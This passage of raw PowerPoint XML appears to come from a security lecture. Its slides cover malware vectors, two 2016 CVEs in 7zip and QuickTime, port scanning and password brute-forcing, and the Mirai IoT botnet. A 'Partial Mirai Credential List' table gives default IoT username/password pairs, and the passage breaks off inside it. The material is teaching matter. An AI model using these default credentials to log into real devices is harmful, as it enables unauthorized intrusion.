            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3598677-2C1E-4A0E-BC86-63D4075F3936}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5325297" y="4104096"/>
              <a:ext cx="1977273" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                <a:t>VisualBasic</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t> script</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>macros</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EDB550E-2625-46A8-B13A-9B150E6CF673}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5393978" y="5488991"/>
              <a:ext cx="1217449" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Flash and</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>JavaScript</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C793C473-55B5-44CF-9A9B-116DC626C0CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4679074" y="3191206"/>
              <a:ext cx="2284023" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
                <a:t>Scripting Languages</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA38F606-1965-4F24-B744-BDAE838805FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7751040" y="3187066"/>
            <a:ext cx="4351171" cy="3573807"/>
            <a:chOff x="7751040" y="3187066"/>
            <a:chExt cx="4351171" cy="3573807"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D14A6E5D-33D5-4AC2-A783-682B9A7EEC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4603" y="3687764"/>
              <a:ext cx="1148773" cy="1148773"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="Picture 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56D6FBF5-2979-4068-A3C4-42AB5BFF0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887" y="3899376"/>
              <a:ext cx="1204258" cy="1204258"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Picture 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8D4DD2D-899F-4444-B58A-4222037F50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217" y="4362739"/>
              <a:ext cx="1148773" cy="1148773"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3470B0D3-184E-4790-989B-21D0E25AD0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1040" y="5126811"/>
              <a:ext cx="1148773" cy="1148773"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D89AF641-F2DB-412A-A236-360DDBD281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5810" y="5612100"/>
              <a:ext cx="1148773" cy="1148773"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="TextBox 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9077423F-31E8-47F2-9949-220B0C773018}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8671720" y="3187066"/>
              <a:ext cx="2963312" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
                <a:t>Exploitable Vulnerabilities</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="TextBox 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{915F0882-7232-4F06-8B12-C0B2F6B5C6F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10163833" y="4003426"/>
              <a:ext cx="1938378" cy="2246769"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Any complex file format can potentially trigger exploitable bugs and contain shellcode</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle: Rounded Corners 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C412525-97D1-499A-A77F-5F89D1E278F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2492188" y="4257984"/>
            <a:ext cx="615577" cy="400110"/>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5AE79C2-023D-48DD-A831-A8F3886F8D08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2884059" y="5642879"/>
            <a:ext cx="615577" cy="400110"/>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50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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38"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CBB88-95FF-42EC-A7CB-478D9B872105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application Exploit Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04888B40-5B8E-412D-AA3B-9E0702F7289D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3693458" y="1825625"/>
            <a:ext cx="7660341" cy="1903693"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CVE-2016-2334</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap-based buffer overflow in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ExtractZlibFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> method in 7zip and p7zip allows remote attackers to execute arbitrary code via a crafted HFS+ image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CC56794-5ACF-4DDF-BD9F-EF05638660B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3693457" y="4631765"/>
            <a:ext cx="7660341" cy="1419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CVE-2016-5108</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflow in Processing QuickTime IMA Files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BD91C00-9922-4B18-8A86-D0611C334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58271"/>
            <a:ext cx="2438400" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58640C5B-2004-41BC-98A4-CCC5F4803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960" y="4311377"/>
            <a:ext cx="1756879" cy="1756879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1430985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10506-A43F-47F1-9C89-F9217E1162FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6972EE09-3F55-48A3-9900-1A59269BA911}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatically connect to systems over the internet and attempt to exploit flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port scanning and fingerprinting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which services are open and what software is running?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port 80/443 – HTTP(S)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port 139/445 – Windows file sharing (SMB; Server Message Block)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password brute force cracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port 22 – SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port 23 – Telnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port 3389 – Windows Remote Desktop Protocol (RDP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1167671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0CBDF-1B13-48BF-9F54-9A70CAA291FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="7068671" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mirai</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{616A6A5C-AE75-4CA0-BD7C-720007D9154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821" r="17816"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7954681" y="0"/>
            <a:ext cx="4237319" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDB2D85B-53F8-46AE-8E18-D0EC86373E87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1625600"/>
            <a:ext cx="6751918" cy="5056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First large-scale IoT botnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Released in August 2016</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infected ~500k devices within a few days</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Responsible for one of the largest DDoS attacks in history, directed at Brian Krebs :O</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trivial infection mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hardcoded list of 60 default username/passwords for common IoT devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wireless Access Points (WAPs), IP cameras, Digital Video Recorders (DVRs), etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1388327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802FD-36F4-45AC-97BF-C8DCE357FC5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Partial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mirai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Credential List</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F14BB8A0-C960-429C-BCDD-6690FE1CB876}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3534415534"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="1825625"/>
          <a:ext cx="3153220" cy="4820920"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1514348">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2869161968"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1638872">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="865460026"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Username</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2632789603"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>666666</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>666666</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3973211931"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>888888</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>888888</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1496958427"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" i="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(none)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2515906121"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1111</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
